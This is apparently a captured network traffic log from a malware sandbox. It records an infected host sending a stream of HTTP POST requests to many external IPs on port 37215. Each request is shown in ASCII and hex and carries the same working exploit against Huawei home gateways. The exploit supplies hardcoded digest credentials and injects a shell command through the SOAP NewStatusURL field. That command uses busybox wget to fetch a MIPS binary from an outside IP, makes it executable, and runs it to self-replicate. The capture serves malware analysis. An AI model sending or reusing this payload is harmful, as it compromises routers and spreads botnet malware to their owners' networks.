                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2137192.168.2.2359414157.74.211.22737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.625098944 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2138192.168.2.2342362197.180.67.16137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.625591993 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2139192.168.2.2337536157.58.4.14937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.626411915 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2140192.168.2.233707053.153.45.15937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.626413107 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2141192.168.2.2346512157.123.80.21637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.626432896 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2142192.168.2.2345994157.200.219.10837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.626462936 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2143192.168.2.2348850157.177.54.14837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.626543045 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2144192.168.2.233796686.52.103.23037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.627103090 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2145192.168.2.233996641.4.247.22937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.627114058 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2146192.168.2.235364249.149.18.837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.627151966 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2147192.168.2.234684241.24.23.7737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.627438068 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
